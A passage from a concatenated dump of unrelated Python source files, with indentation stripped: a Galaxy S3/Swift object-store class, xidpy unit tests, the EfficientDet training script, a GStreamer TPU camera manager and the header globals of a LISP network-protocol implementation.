os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_s3(rel_path))
return False
def exists(self, obj, **kwargs):
in_cache = in_s3 = False
rel_path = self._construct_path(obj, **kwargs)
# Check cache
if self._in_cache(rel_path):
in_cache = True
# Check S3
in_s3 = self._key_exists(rel_path)
# log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
# dir_only does not get synced so shortcut the decision
dir_only = kwargs.get('dir_only', False)
base_dir = kwargs.get('base_dir', None)
if dir_only:
if in_cache or in_s3:
return True
# for JOB_WORK directory
elif base_dir:
if not os.path.exists(rel_path):
os.makedirs(rel_path)
return True
else:
return False
# TODO: Sync should probably not be done here. Add this to an async upload stack?
if in_cache and not in_s3:
self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
return True
elif in_s3:
return True
else:
return False
def create(self, obj, **kwargs):
if not self.exists(obj, **kwargs):
# Pull out locally used fields
extra_dir = kwargs.get('extra_dir', None)
extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
dir_only = kwargs.get('dir_only', False)
alt_name = kwargs.get('alt_name', None)
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj.id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# Create given directory in cache
cache_dir = os.path.join(self.staging_path, rel_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
# Although not really necessary to create S3 folders (because S3 has
# flat namespace), do so for consistency with the regular file system
# S3 folders are marked by having trailing '/' so add it now
# s3_dir = '%s/' % rel_path
# self._push_to_os(s3_dir, from_string='')
# If instructed, create the dataset in cache & in S3
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
open(os.path.join(self.staging_path, rel_path), 'w').close()
self._push_to_os(rel_path, from_string='')
def empty(self, obj, **kwargs):
if self.exists(obj, **kwargs):
return bool(self.size(obj, **kwargs) > 0)
else:
raise ObjectNotFound('objectstore.empty, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def size(self, obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
if self._in_cache(rel_path):
try:
return os.path.getsize(self._get_cache_path(rel_path))
except OSError as ex:
log.info("Could not get size of file '%s' in local cache, will try S3. Error: %s", rel_path, ex)
elif self.exists(obj, **kwargs):
return self._get_size_in_s3(rel_path)
log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
return 0
def delete(self, obj, entire_dir=False, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
try:
# Remove temparory data in JOB_WORK directory
if base_dir and dir_only and obj_dir:
shutil.rmtree(os.path.abspath(rel_path))
return True
# For the case of extra_files, because we don't have a reference to
# individual files/keys we need to remove the entire directory structure
# with all the files in it. This is easy for the local file system,
# but requires iterating through each individual key in S3 and deleing it.
if entire_dir and extra_dir:
shutil.rmtree(self._get_cache_path(rel_path))
results = self.bucket.get_all_keys(prefix=rel_path)
for key in results:
log.debug("Deleting key %s", key.name)
key.delete()
return True
else:
# Delete from cache first
os.unlink(self._get_cache_path(rel_path))
# Delete from S3 as well
if self._key_exists(rel_path):
key = Key(self.bucket, rel_path)
log.debug("Deleting key %s", key.name)
key.delete()
return True
except S3ResponseError:
log.exception("Could not delete key '%s' from S3", rel_path)
except OSError:
log.exception('%s delete error', self.get_filename(obj, **kwargs))
return False
def get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path), 'r')
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def get_filename(self, obj, **kwargs):
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
rel_path = self._construct_path(obj, **kwargs)
# for JOB_WORK directory
if base_dir and dir_only and obj_dir:
return os.path.abspath(rel_path)
cache_path = self._get_cache_path(rel_path)
# S3 does not recognize directories as files so cannot check if those exist.
# So, if checking dir only, ensure given dir exists in cache and return
# the expected cache path.
# dir_only = kwargs.get('dir_only', False)
# if dir_only:
# if not os.path.exists(cache_path):
# os.makedirs(cache_path)
# return cache_path
# Check if the file exists in the cache first
if self._in_cache(rel_path):
return cache_path
# Check if the file exists in persistent storage and, if it does, pull it into cache
elif self.exists(obj, **kwargs):
if dir_only: # Directories do not get pulled into cache
return cache_path
else:
if self._pull_into_cache(rel_path):
return cache_path
# For the case of retrieving a directory only, return the expected path
# even if it does not exist.
# if dir_only:
# return cache_path
raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s'
% (str(obj), str(kwargs)))
# return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
if create:
self.create(obj, **kwargs)
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Chose whether to use the dataset file itself or an alternate file
if file_name:
source_file = os.path.abspath(file_name)
# Copy into cache
cache_file = self._get_cache_path(rel_path)
try:
if source_file != cache_file:
# FIXME? Should this be a `move`?
shutil.copy2(source_file, cache_file)
self._fix_permissions(cache_file)
except OSError:
log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
else:
source_file = self._get_cache_path(rel_path)
# Update the file on S3
self._push_to_os(rel_path, source_file)
else:
raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def get_object_url(self, obj, **kwargs):
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = Key(self.bucket, rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except S3ResponseError:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
def get_store_usage_percent(self):
return 0.0
class SwiftObjectStore(S3ObjectStore):
"""
Object store that stores objects as items in a Swift bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and Swift.
"""
def _configure_connection(self):
log.debug("Configuring Swift Connection")
self.conn = boto.connect_s3(aws_access_key_id=self.access_key,
aws_secret_access_key=self.secret_key,
is_secure=self.is_secure,
host=self.host,
port=self.port,
calling_format=boto.s3.connection.OrdinaryCallingFormat(),
path=self.conn_path)
|
xidpy_test.py | import unittest
from xidpy import Xid
TestXids = [
# taken from https://github.com/rs/xid/blob/master/id_test.go
{
'xid': Xid([0x4d, 0x88, 0xe1, 0x5b, 0x60, 0xf4, 0x86, 0xe4, 0x28, 0x41, 0x2d, 0xc9]),
'ts': 1300816219,
'machine': ''.join(map(chr, [0x60, 0xf4, 0x86])),
'pid': 0xe428,
'counter': 4271561
},
{
'xid': Xid([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]),
'ts': 0,
'machine': ''.join(map(chr, [0x00, 0x00, 0x00])),
'pid': 0x0000,
'counter': 0
},
{
'xid': Xid([0x00, 0x00, 0x00, 0x00, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0x00, 0x00, 0x01]),
'ts': 0,
'machine': ''.join(map(chr, [0xaa, 0xbb, 0xcc])),
'pid': 0xddee,
'counter': 1
}
]
class TestXid(unittest.TestCase):
def test_no_duplicates(self):
collect = []
for i in range(0, 1000):
collect.append(Xid())
ids = [i.string() for i in collect]
self.assertEqual(len(set(ids)), 1000)
def test_from_string(self):
x = Xid()
y = Xid.from_string(x.string())
self.assertEqual(x.value, y.value)
self.assertEqual(x.bytes(), y.bytes())
self.assertEqual(x.string(), y.string())
def test_xid_always_reversible(self):
for i in range(50):
v = Xid()
s = v.string()
self.assertEqual(Xid.from_string(s).value, v.value)
def test_timestamp(self):
for x in TestXids:
self.assertEqual(x.get('xid').time(), x.get('ts'))
def test_machine(self):
for x in TestXids:
self.assertEqual(x.get('xid').machine(), x.get('machine'))
def test_pid(self):
for x in TestXids:
self.assertEqual(x.get('xid').pid(), x.get('pid'))
def test_counter(self):
for x in TestXids:
self.assertEqual(x.get('xid').counter(), x.get('counter'))
def test_copy_array_from_golang(self):
x = Xid([0x4d, 0x88, 0xe1, 0x5b, 0x60, 0xf4,
0x86, 0xe4, 0x28, 0x41, 0x2d, 0xc9])
self.assertEqual('9m4e2mr0ui3e8a215n4g', x.string())
def test_copy_string_from_golang(self):
x = Xid.from_string('9m4e2mr0ui3e8a215n4g')
self.assertEqual(x.value, [0x4d, 0x88, 0xe1, 0x5b, 0x60, 0xf4,
0x86, 0xe4, 0x28, 0x41, 0x2d, 0xc9])
def test_thread_safety(self):
import threading
threads = []
def worker():
for i in range(10):
threading.current_thread().ident, Xid().string()
for i in range(10):
t = threading.Thread(target=worker)
threads.append(t)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
unittest.main()
|
main.py | # Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import multiprocessing
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
import dataloader
import det_model_fn
import hparams_config
import utils
flags.DEFINE_string(
'tpu',
default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url.')
flags.DEFINE_string(
'gcp_project',
default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone',
default=None,
help='GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'gpus', ''],
'Training: gpus for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
'use_xla', False,
'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
'and this flag has no effect.')
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
'initialization.')
flags.DEFINE_string('ckpt', None,
'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
' containing attributes to use as hyperparameters.')
flags.DEFINE_integer(
'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
'num_cores_per_replica',
default=2,
help='Number of TPU cores per replica when using spatial partition.')
flags.DEFINE_multi_integer(
'input_partition_dims', [1, 2, 1, 1],
'A list that describes the partition dims for all the tensors.')
flags.DEFINE_integer('train_batch_size', 64, 'global training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'global evaluation batch size')
flags.DEFINE_integer('eval_samples', 5000, 'Number of samples for eval.')
flags.DEFINE_integer('iterations_per_loop', 200,
'Number of iterations per TPU training loop')
flags.DEFINE_integer('save_checkpoints_steps', 200,
'Number of iterations per checkpoint save')
flags.DEFINE_string(
'training_file_pattern', None,
'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('validation_file_pattern', None,
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
'val_json_file', None,
'COCO validation JSON containing golden bounding boxes. If None, use the '
'ground truth from the dataloader. Ignored if testdev_dir is not None.')
flags.DEFINE_string('testdev_dir', None,
'COCO testdev dir. If not None, ignorer val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_string('mode', 'train',
'Mode to run: train or eval (default: train)')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_training', False, 'Run one eval after the '
'training finishes.')
flags.DEFINE_bool('profile', False, 'Profile training performance.')
flags.DEFINE_integer(
'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 300,
'Minimum seconds between evaluations.')
flags.DEFINE_integer(
'eval_timeout', None,
'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
flags.DEFINE_bool(
'run_epoch_in_child_process', True,
'This option helps to rectify CPU memory leak. If True, every epoch is '
'run in a separate process for train and eval and memory will be cleared.'
'Drawback: need to kill 2 processes if trainining needs to be interrupted.')
FLAGS = flags.FLAGS
def main(_):
if FLAGS.strategy == 'tpu':
tf.disable_eager_execution()
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
tpu_grpc_url = tpu_cluster_resolver.get_master()
tf.Session.reset(tpu_grpc_url)
else:
# Always enable auto mixed precision graph rewrite
os.environ['TF_AUTO_MIXED_PRECISION_GRAPH_REWRITE_IGNORE_PERFORMANCE'] = '1'
tpu_cluster_resolver = None
# Check data path
if FLAGS.mode in ('train', 'train_and_eval'):
if FLAGS.training_file_pattern is None:
raise RuntimeError('Must specify --training_file_pattern for train.')
if FLAGS.mode in ('eval', 'train_and_eval'):
if FLAGS.validation_file_pattern is None:
raise RuntimeError('Must specify --validation_file_pattern for eval.')
# Parse and override hparams
config = hparams_config.get_detection_config(FLAGS.model_name)
config.override(FLAGS.hparams)
if FLAGS.num_epochs: # NOTE: remove this flag after updating all docs.
config.num_epochs = FLAGS.num_epochs
# Parse image size in case it is in string format.
config.image_size = utils.parse_image_size(config.image_size)
# The following is for spatial partitioning. `features` has one tensor while
# `labels` had 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
# partition is performed on `features` and all partitionable tensors of
# `labels`, see the partition logic below.
# In the TPUEstimator context, the meaning of `shard` and `replica` is the
# same; follwing the API, here has mixed use of both.
if FLAGS.use_spatial_partition:
# Checks input_partition_dims agrees with num_cores_per_replica.
if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
raise RuntimeError('--num_cores_per_replica must be a product of array'
'elements in --input_partition_dims.')
labels_partition_dims = {
'mean_num_positives': None,
'source_ids': None,
'groundtruth_data': None,
'image_scales': None,
'image_masks': None,
}
# The Input Partition Logic: We partition only the partition-able tensors.
feat_sizes = utils.get_feat_sizes(
config.get('image_size'), config.get('max_level'))
for level in range(config.get('min_level'), config.get('max_level') + 1):
def _can_partition(spatial_dim):
partitionable_index = np.where(
spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)
spatial_dim = feat_sizes[level]
if _can_partition(spatial_dim['height']) and _can_partition(
spatial_dim['width']):
labels_partition_dims['box_targets_%d' %
level] = FLAGS.input_partition_dims
labels_partition_dims['cls_targets_%d' %
level] = FLAGS.input_partition_dims
else:
labels_partition_dims['box_targets_%d' % level] = None
labels_partition_dims['cls_targets_%d' % level] = None
num_cores_per_replica = FLAGS.num_cores_per_replica
input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
num_shards = FLAGS.num_cores // num_cores_per_replica
else:
num_cores_per_replica = None
input_partition_dims = None
num_shards = FLAGS.num_cores
params = dict(
config.as_dict(),
model_name=FLAGS.model_name,
iterations_per_loop=FLAGS.iterations_per_loop,
model_dir=FLAGS.model_dir,
num_shards=num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
strategy=FLAGS.strategy,
backbone_ckpt=FLAGS.backbone_ckpt,
ckpt=FLAGS.ckpt,
val_json_file=FLAGS.val_json_file,
testdev_dir=FLAGS.testdev_dir,
profile=FLAGS.profile,
mode=FLAGS.mode)
config_proto = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False)
if FLAGS.strategy != 'tpu':
if FLAGS.use_xla:
config_proto.graph_options.optimizer_options.global_jit_level = (
tf.OptimizerOptions.ON_1)
config_proto.gpu_options.allow_growth = True
model_dir = FLAGS.model_dir
model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
max_instances_per_image = config.max_instances_per_image
if FLAGS.eval_samples:
eval_steps = int((FLAGS.eval_samples + FLAGS.eval_batch_size - 1) //
FLAGS.eval_batch_size)
else:
eval_steps = None
total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
train_steps = total_examples // FLAGS.train_batch_size
logging.info(params)
if not tf.io.gfile.exists(model_dir):
tf.io.gfile.makedirs(model_dir)
config_file = os.path.join(model_dir, 'config.yaml')
if not tf.io.gfile.exists(config_file):
tf.io.gfile.GFile(config_file, 'w').write(str(config))
train_input_fn = dataloader.InputReader(
FLAGS.training_file_pattern,
is_training=True,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
eval_input_fn = dataloader.InputReader(
FLAGS.validation_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
if FLAGS.strategy == 'tpu':
tpu_config = tf.estimator.tpu.TPUConfig(
FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
num_cores_per_replica=num_cores_per_replica,
input_partition_dims=input_partition_dims,
per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
.PER_HOST_V2)
run_config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=model_dir,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
tpu_config=tpu_config,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
# TPUEstimator can do both train and eval.
train_est = tf.estimator.tpu.TPUEstimator(
model_fn=model_fn_instance,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size,
config=run_config,
params=params)
eval_est = train_est
else:
strategy = None
if FLAGS.strategy == 'gpus':
strategy = tf.distribute.MirroredStrategy()
run_config = tf.estimator.RunConfig(
model_dir=model_dir,
train_distribute=strategy,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
def get_estimator(global_batch_size):
params['num_shards'] = getattr(strategy, 'num_replicas_in_sync', 1)
params['batch_size'] = global_batch_size // params['num_shards']
return tf.estimator.Estimator(
model_fn=model_fn_instance, config=run_config, params=params)
# train and eval need different estimator due to different batch size.
train_est = get_estimator(FLAGS.train_batch_size)
eval_est = get_estimator(FLAGS.eval_batch_size)
# start train/eval flow.
if FLAGS.mode == 'train':
train_est.train(input_fn=train_input_fn, max_steps=train_steps)
if FLAGS.eval_after_training:
eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
elif FLAGS.mode == 'eval':
# Run evaluation when there's a new checkpoint
for ckpt in tf.train.checkpoints_iterator(
FLAGS.model_dir,
min_interval_secs=FLAGS.min_eval_interval,
timeout=FLAGS.eval_timeout):
logging.info('Starting to evaluate.')
try:
eval_results = eval_est.evaluate(eval_input_fn, steps=eval_steps)
# Terminate eval job when final checkpoint is reached.
try:
current_step = int(os.path.basename(ckpt).split('-')[1])
except IndexError:
logging.info('%s has no global step info: stop!', ckpt)
break
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
if current_step >= train_steps:
logging.info('Eval finished step %d/%d', current_step, train_steps)
break
except tf.errors.NotFoundError:
# Checkpoint might be not already deleted by the time eval finished.
# We simply skip ssuch case.
logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
elif FLAGS.mode == 'train_and_eval':
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
try:
step = int(os.path.basename(ckpt).split('-')[1])
current_epoch = (
step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
except (IndexError, TypeError):
logging.info('Folder %s has no ckpt with valid step.', FLAGS.model_dir)
current_epoch = 0
def run_train_and_eval(e):
print('\n =====> Starting training, epoch: %d.' % e)
train_est.train(
input_fn=train_input_fn,
max_steps=e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
print('\n =====> Starting evaluation, epoch: %d.' % e)
eval_results = eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
epochs_per_cycle = 1 # higher number has less graph construction overhead.
for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
if FLAGS.run_epoch_in_child_process:
p = multiprocessing.Process(target=run_train_and_eval, args=(e,))
p.start()
p.join()
if p.exitcode != 0:
return p.exitcode
else:
run_train_and_eval(e)
else:
logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
app.run(main)
|
TPUCameraManager.py | from . import gstreamer
import threading
import enum
import numpy as np
# gst-launch-1.0 v4l2src device="/dev/video0" ! video/x-raw,width=640,height=480,framerate=30/1 ! videoconvert ! video/x-raw,format=I420 ! autovideosink
class CameraManager:
def __init__(self):
self.camClasses = []
def newCam(self,device):
newCamClass = Cam(device)
self.camClasses.append(newCamClass)
return newCamClass
def closeAll(self):
for camClass in self.camClasses:
camClass.stopPipeline()
camClass.removeAllPipelines()
self.camClasses.remove(camClass)
def close(self,camClass):
camClass.stopPipeline()
camClass.removeAllPipelines()
self.camClasses.remove(camClass)
def __len__():
return len(camClasses)
class Cam:
def __init__(self,device):
self.pipeline = str(GStreamerPipelines.SRC).format(device)
self.signals = {}
self.streams = {}
def on_buffer(self, data, streamName):
self.streams[streamName].newData(data)
def getImage(self):
if self.streamType is GStreamerPipelines.RGB:
self.newdata = False
nparr = np.frombuffer(self.data, dtype=np.uint8)
image = nparr.reshape(self.res[1], self.res[0], 3)
return(image)
else:
print("Can't return image of H264 stream")
return(None)
def addPipeline(self,pipeline,res,fps,sinkName):
self.pipeline += " " + str(pipeline).format(res[0],res[1],fps,sinkName)
self.signals[sinkName] = {'new-sample': gstreamer.new_sample_callback(self.on_buffer,sinkName),'eos' : gstreamer.on_sink_eos}
self.streams[sinkName] = StreamValue()
return(self.streams[sinkName])
def removePipeline(self,sinkName):
del self.streams[sinkName]
del self.signals[sinkName]
def removeAllPipelines(self):
self.streams.clear()
self.signals.clear()
def startPipeline(self):
self.thread = threading.Thread(target=gstreamer.run_pipeline,args=(self.pipeline,self.on_buffer,self.signals))
self.thread.start()
def stopPipeline(self):
gstreamer.quit()
self.thread.join()
def __bytes__(self):
self.newdata = False
return self.data
def __bool__(self):
return self.newdata
class StreamValue():
def __init__(self):
self.data = None
self.updatedData = False
self.listeners = []
def __bytes__(self):
self.updatedData = False
return self.data
def __bool__(self):
return self.updatedData
def newData(self,data):
self.data = data
for listener in self.listeners:
listener.write(self.data)
self.updatedData = True
def addListener(self,obj):
self.listeners.append(obj)
class GStreamerPipelines(enum.Enum):
SRC = "v4l2src device=/dev/video{0} ! tee name=t"
H264 = "t. ! queue max-size-buffers=1 leaky=downstream ! video/x-raw,format=YUY2,width={0},height={1},framerate={2}/1 ! videoconvert ! x264enc speed-preset=ultrafast tune=zerolatency threads=4 key-int-max=5 bitrate=1000 aud=False bframes=1 ! video/x-h264,profile=baseline ! h264parse ! video/x-h264,stream-format=byte-stream,alignment=nal ! appsink name={3} emit-signals=True max-buffers=1 drop=False sync=False"
RGB = "t. ! queue ! glfilterbin filter=glbox ! video/x-raw,format=RGB,width={0},height={1},framerate={2}/1 ! appsink name={3} emit-signals=True max-buffers=1 drop=True sync=False"
MJPEG = "t. ! queue ! video/x-raw,format=YUY2,width={0},height={1},framerate={2}/1 ! jpegenc quality=20 ! appsink name={3} emit-signals=True"
YUYV = "video/x-raw,width=640,height=480,framerate=30/1 ! videoconvert ! video/x-raw,format=I420 ! autovideosink"
def __str__(self):
return self.value
|
lisp.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by a instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time creates the g, p, and public-key values. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests.
#
lisp_last_map_request_sent = None
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll has the first long of a ICMP echo-request and
# echo-reply for testing purposes. To show per packet load-splitting.
#
